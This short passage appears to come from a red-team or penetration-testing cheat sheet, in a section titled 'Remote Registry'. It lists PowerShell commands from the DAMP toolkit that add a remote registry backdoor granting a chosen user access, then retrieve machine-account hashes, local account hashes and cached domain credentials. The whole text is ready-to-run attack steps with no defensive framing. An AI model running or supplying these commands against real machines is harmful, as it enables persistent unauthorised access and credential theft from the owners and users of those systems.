5️⃣ Remote Registry

Using the DAMP toolkit
. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval

Using DAMP with admin privs on the remote machine
Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose

Retrieve the machine account hash from the local machine
Get-RemoteMachineAccountHash -Computername <computername> -Verbose

Retrieve the local account hash from the local machine
Get-RemoteLocalAccountHash -Computername <computername> -Verbose

Retrieve domain cached credentials from the local machine
Get-RemoteCachedCredential -Computername <computername> -Verbose